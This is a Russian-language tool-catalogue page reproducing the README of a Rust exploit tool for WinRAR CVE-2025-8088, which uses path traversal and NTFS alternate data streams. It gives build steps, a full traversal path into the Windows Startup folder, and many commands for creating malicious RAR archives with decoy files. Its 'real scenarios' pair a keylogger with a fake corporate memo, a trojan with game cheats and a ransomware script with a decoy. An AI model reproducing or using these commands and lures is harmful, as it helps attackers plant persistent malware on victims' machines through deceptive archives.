Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WinRAR-Exploit-Tool---Rust-Edition — Высокопроизводительная, безопасная по памяти реализация инструмента эксплойта WinRAR CVE-2025-8088, переписанная на Rust для повышения надежности и производительности. | Kitploit
Инструменты/GitHubGitHub/kitsuneshade/winrar-exploit-tool---rust-edition
Механизмы персистентностиЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubkitsuneshade/winrar-exploit-tool---rust-edition

WinRAR-Exploit-Tool---Rust-Edition

Высокопроизводительная, безопасная по памяти реализация инструмента эксплойта WinRAR CVE-2025-8088, переписанная на Rust для повышения надежности и производительности.

Репозиторий
8311 месяцев назадЕщё не проверено

WinRAR Exploit Tool - Rust Edition

Продвинутый инструмент эксплуатации Path Traversal в WinRAR — на Rust

Высокопроизводительная, безопасная с точки зрения памяти реализация эксплойта WinRAR CVE-2025-8088, переписанная на Rust для лучшей надёжности и производительности.

Особенности

  • Эксплуатация ADS — NTFS Alternate Data Streams для сокрытия полезной нагрузки
  • Манипуляция заголовками RAR5 — Прямое патчирование заголовков для внедрения пути
  • Современный GUI — Красивый интерфейс на GTK с CSS-стилями
  • Целевой запуск — Автоматическое размещение полезной нагрузки в автозагрузке Windows
  • Поддержка собственных файлов-приманок — Используйте свои файлы-приманки или стандартные
  • Универсальная поддержка файлов — Поддерживаются любые типы файлов как для полезной нагрузки, так и для приманки
  • Надёжная обработка ошибок — Полная проверка ошибок и диагностика
  • Диагностика системы — Автоматическая проверка совместимости системы
  • Эффективное использование памяти — Низкое потребление памяти с разумным управлением ресурсами

Требования

  • Rust 1.70+ — Современный набор инструментов Rust
  • Библиотеки разработки GTK — Для поддержки GUI
  • CLI WinRAR — Для создания архивов RAR
  • Windows 10/11 — Требуется поддержка NTFS

Быстрый старт

1. Установка Rust

root@kitploit:~
# Установка Rust через rustup


# Проверка установки
rustc --version
cargo --version

2. Установка библиотек разработки GTK

Windows (MSVC)

root@kitploit:~
# Используя vcpkg
vcpkg install gtk:x64-windows

Или через MSYS2

root@kitploit:~
pacman -S mingw-w64-x86_64-gtk4

3. Клонирование и сборка

root@kitploit:~
# Перейдите в каталог проекта Rust
cd winrar_exploit_rust

# Сборка в режиме отладки
cargo build

# Сборка оптимизированного релиза
cargo build --release

# Запуск приложения
cargo run --release

Использование

  1. Выберите полезную нагрузку — Выберите любой файл в качестве полезной нагрузки (.exe, .bat, .jpg, .pdf и т.д.)
  2. Выберите приманку — Выберите любой файл в качестве приманки (если не указан, будет создан стандартный)
  3. Назовите архив — Введите имя выходного RAR-файла
  4. Создайте — Сгенерируйте эксплойт-архив

Примеры

Базовое использование

Создание простого эксплойта с полезной нагрузкой и файлом-приманкой:

root@kitploit:~
# Создание эксплойта с исполняемой полезной нагрузкой
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# Создание эксплойта со скриптом в качестве полезной нагрузки
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"

Продвинутое использование

Несколько файлов-приманок

root@kitploit:~
# Использование нескольких приманок, разделённых запятыми
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"

Пользовательский каталог размещения

root@kitploit:~
# Укажите пользовательский каталог, куда будет помещена полезная нагрузка
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"

Разные типы полезной нагрузки

root@kitploit:~
# Полезная нагрузка в виде изображения (стеганография)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

# Полезная нагрузка в формате PDF
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

# Полезная нагрузка в виде пакетного скрипта
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"

Диагностика системы

root@kitploit:~
# Запуск системной диагностики для проверки совместимости
.\winrar_exploit_rust.exe diagnose

# Показать доступные инструменты и функции
.\winrar_exploit_rust.exe tools

Реальные сценарии

Сценарий 1: Корпоративная среда

root@kitploit:~
# Создание вредоносного документа, выглядящего как корпоративная служебная записка
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"

Сценарий 2: Игровое сообщество

root@kitploit:~
# Сокрытие вредоносного ПО в файле читов для игр
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"

Инструмент создаёт архивы RAR с path traversal, используя:

  1. Создание ADS — Скрывает полезную нагрузку в альтернативных потоках данных NTFS
  2. Построение RAR — Создаёт базовый RAR с ADS через CLI WinRAR
  3. Патчинг заголовка — Внедряет путь обхода в заголовки RAR5
  4. Пересчёт CRC — Обеспечивает целостность архива
  5. Вывод — Предоставляет вредоносный RAR, готовый к извлечению

Пример пути: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

Поддерживаемые типы файлов

Файлы полезной нагрузки:

  • ✅ Исполняемые (.exe, .bat, .cmd)
  • ✅ Скрипты (.py, .js, .vbs, .ps1)
  • ✅ Документы (.pdf, .docx, .xlsx)
  • ✅ Изображения (.jpg, .png, .gif)
  • ✅ Видео (.mp4, .avi)
  • ✅ Аудио (.mp3, .wav)
  • ✅ Любой тип файла

Файлы-приманки:

  • ✅ Текстовые (.txt, .doc, .pdf)
  • ✅ Изображения (.jpg, .png, .gif, .bmp)
  • ✅ Видео (.mp4, .avi)
  • ✅ Аудио (.mp3, .wav)
  • ✅ Документы (.docx, .xlsx)
  • ✅ Любой тип файла

Архитектура

root@kitploit:~
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Точка входа приложения
│   ├── gui.rs           # Пользовательский интерфейс на GTK
│   ├── exploit.rs       # Основная логика эксплойта
│   ├── ads.rs           # Манипуляция ADS в NTFS
│   ├── rar.rs           # Манипуляция заголовками RAR5
│   ├── diagnostics.rs   # Системная диагностика
│   └── error.rs         # Обработка ошибок
├── Cargo.toml           # Зависимости и конфигурация сборки
└── README.md           # Этот файл

Устранение неполадок

Инструмент включает автоматическую диагностику, которая проверяет:

  • ✅ Установка WinRAR CLI
  • ✅ Поддержка ADS в NTFS
  • ✅ Права доступа к каталогу автозагрузки
  • ✅ Доступность библиотеки GTK
  • ✅ Совместимость файловой системы

Частые проблемы:

  1. "GTK не найден"

    root@kitploit:~
    # Установите библиотеки разработки GTK
    # Windows (vcpkg)
    vcpkg install gtk:x64-windows
    
    # Или через MSYS2
    pacman -S mingw-w64-x86_64-gtk4
    
  2. "WinRAR CLI не найден"

    • Установите WinRAR с https://www.winrar.com
    • Убедитесь, что rar.exe находится в Program Files
  3. "Не удаётся записать в каталог автозагрузки"

    • Запустите инструмент от имени администратора
    • Проверьте права доступа к папке
  4. "ADS в NTFS не поддерживается"

    • Убедитесь, что используется файловая система NTFS
    • ADS не поддерживается на FAT32/exFAT
  5. Ошибки компиляции

    root@kitploit:~
    # Обновите набор инструментов Rust
    rustup update
    
    # Очистите и пересоберите
    cargo clean
    cargo build --release
    

Форматирование кода

root@kitploit:~
# Форматирование кода
cargo fmt

# Проверка кода линтером
cargo clippy

Зависимости

Ключевые зависимости включают:

  • gtk — Современный GUI-фреймворк
  • tokio — Асинхронная среда выполнения
  • windows — Привязки Windows API
  • crc32fast — Быстрый расчёт CRC32
  • byteorder — Манипуляции с порядком байтов
  • anyhow — Обработка ошибок

Вопросы безопасности

  • Учебная цель: Этот инструмент предназначен только для авторизованного тестирования и образовательных целей
  • Контролируемая среда: Используйте только в контролируемых средах с надлежащего согласия
  • Соблюдение законодательства: Обеспечьте соблюдение применимых законов и нормативных актов
  • Ответственное раскрытие: Следуйте практикам ответственного раскрытия информации

Лицензия

Этот проект лицензирован под лицензией MIT — подробности см. в файле LICENSE.

Автор

Сделано @kanonufo в Telegram


Высокопроизводительный инструмент красной команды для эксплуатации CVE-2025-8088 — Rust Edition

Скачать инструмент